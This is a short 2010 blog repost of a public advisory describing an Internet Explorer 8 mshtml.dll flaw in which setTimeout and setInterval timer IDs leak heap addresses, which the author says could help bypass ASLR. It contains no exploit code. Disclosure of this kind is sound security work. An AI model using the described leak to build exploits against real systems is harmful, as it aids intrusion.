Wednesday, June 30, 2010

ZeroDay: Microsoft IE 'mshtml.dll' Remote Information Disclosure Vulnerability

Original Public Advisory
http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1

Sometimes, exploit writers would kill for a fixed address to pivote from. Nowadays, the days of ASLR and DEP, any memory leak is welcome. Yesterday, Stefano Di Paola posted the following tweet http://twitter.com/WisecWisec/status/17254776077. After elaborating that weird behaviour I discovered a flaw in mshtml.dll, exploitable via Internet Explorer. In VBScript/JScript there are at least two functions that make use of timers: setTimeout and setInterval. According to the documentation, the return value should be a Timer ID. In Chrome and FF [Firefox] this ID is pure sequential (1,2,3,4...) but in IE I was getting "weird" IDs. Later on I discovered that those IDs turned out to be a heap address plus a counter.

[...]

Products affected: XP/Vista/Windows7 32/64 bit. IE8. IE9 is not vulnerable.

----------------------------------------

In plain English, this technique could be used to bypass ASLR or at least make it a less effective protection layer.

More info here.

No comments:

Post a Comment